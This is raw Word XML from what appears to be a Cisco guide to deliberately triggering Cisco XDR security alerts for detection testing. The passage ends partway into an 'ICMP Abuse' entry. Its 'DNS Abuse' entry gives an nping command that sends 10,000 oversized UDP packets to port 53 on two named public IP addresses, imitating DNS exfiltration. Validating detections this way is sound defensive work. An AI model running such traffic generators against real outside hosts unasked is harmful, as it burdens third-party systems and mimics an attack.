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A18FC" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cisco XDR Alert Triggers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DED2581" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DC4BB47" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This guide provides an easy path to trigger alerts in Cisco XDR. It starts by describing the standard format for each trigger and provides some general guidance advice. The next section is a library of network-based alert triggers, which are based on NetFlow or IPFIX type telemetry sources. The next section covers NVM-based alert triggers to detect activity on an endpoint. The final section covers Cisco Secure Endpoint alert triggers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F515E8C" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FA4ECD7" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Alert Trigger Format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651EAE9F" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Every alert is listed in this format:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651E04A4" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Alert Name – this is the actual name shown in Cisco XDR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA50396" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Critical/Medium/High, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14875C93" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Description: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the description for the alert as seen in Cisco XDR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F72708" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Observation Type: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the associated observation for this alert – observations roll up into alerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA11727" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">History: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the baseline history requirement for this alert to fire – any listed as 0 days will fire with a brand new XDR instance, and any greater than 0 days require that the XDR instance must be running and receiving telemetry for at least that number of days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72020450" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Telemetry: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the required telemetry source for this alert to fire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526C6666" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Tactic: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mapping to the MITRE ATT&amp;CK Tactic category and Tactic ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A14247" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Technique: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mapping to the specific MITRE ATT&amp;CK Technique and Technique ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7874DB" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Special Considerations: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>any special notes you should be aware of for this alert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3427F84F" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Preparation Command: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the command you run to install any package(s) required for the trigger command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6DC730" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Trigger Command: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the command you run that generates the traffic to fire the alert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7F6A23" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25177132" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>General Advice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5E52A6" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ensure that the host running the commands is being monitored by Cisco XDR. If the alert requires NetFlow telemetry, then make sure the host is on a network segment that is sending NetFlow or IPFIX type telemetry up to XDR. If the alert requires NVM telemetry, then make sure the host is properly configured to send NVM telemetry up to XDR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309568B9" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Make sure that any alert you want to test is enabled in XDR Analytics – some are disabled by default and must be manually enabled. Toggle the “Enabled” switch to turn it on in Alert settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDF4072" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>You may need to change the IP addresses or subnets in the trigger command for some of the triggers to work. These situations are noted in the “Special Considerations” section where applicable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B83AF2" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Many Cisco XDR alerts use a lookback period to check if the alert has fired before. This is designed to prevent noise by not firing the same alert over and over. This protection prevents the same alert from firing again in a short window. If this happens and you really need for the alert to fire again, just change the IP address of the host running the trigger commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BA0E30" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Be aware that once certain alerts fire, it may prevent other related alerts from firing. For example, if a host performs an aggressive scan on the network and the New IP Scanner alert fires, other alerts that work by scanning the same network segment, such as New SNMP Sweep, may not fire. In these cases, either scan a different subnet or change the IP address of the host running the trigger commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BF0ABA" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Multiple commands can be run sequentially by building scripts – a bash script in Linux and a batch file in Windows. Using a sleep (Linux bash script) or timeout (Windows batch file) command in these scripts can help prevent trying to fire every alert trigger command in rapid succession. Including </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sleep 600</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>timeout 600</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> between trigger commands will run a ten minute pause between commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470B3964" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using an SSH client, such as PuTTY, to connect to the Linux host makes it very easy to copy and paste individual commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A59789" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FB30CF5" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0304D099" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AC33CE5" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F0409B0" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Network Triggers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F49661" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The network trigger commands are run on a Linux box. We recommend Ubuntu Server or Desktop 24.04. This host must be on a network segment that is sending NetFlow or IPFIX telemetry up to XDR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A39E13B" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39824DAE" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DNS Abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EADD5B" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Device has been sending unusually large DNS packets. This may indicate an attacker using the DNS protocol as a covert communications channel to exfiltrate data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3AE166" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Observation Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unusual Packet Size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE5CAC3" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>History:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0 days – there is no baseline history requirement, and the alert will fire with a new XDR instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A08A55" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telemetry:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> NetFlow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E7C383" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Tactic: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Impact (TA0040), Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314429E5" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Technique:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration Over Alternative Protocol (T1048), Reflection Amplification (T1498.002)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F07FD9A" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Special Considerations:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> This alert is enabled by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1098B465" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Preparation Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> no preparation required to run this trigger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4D4A0D" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trigger Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nping --udp -p 53 75.75.75.75 --data-length 1200 -c 10000 --rate 40; sleep 30; nping --udp -p 53 64.102.6.247 --data-length 1200 -c 10000 --rate 40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291EB9E1" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ACDA875" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ICMP Abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC4616D" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Device has been sending unusually large ICMP packets to a new external server. This may indicate an attacker using the ICMP protocol as a covert communications channel to exfiltrate data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDA7308" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Observation Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> New External Server, Unusual Packet Size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7BCAFB" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>History:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0 days – there is no baseline history requirement, and the alert will fire with a new XDR instance</w:t>
      </w:r>
    </w:p>
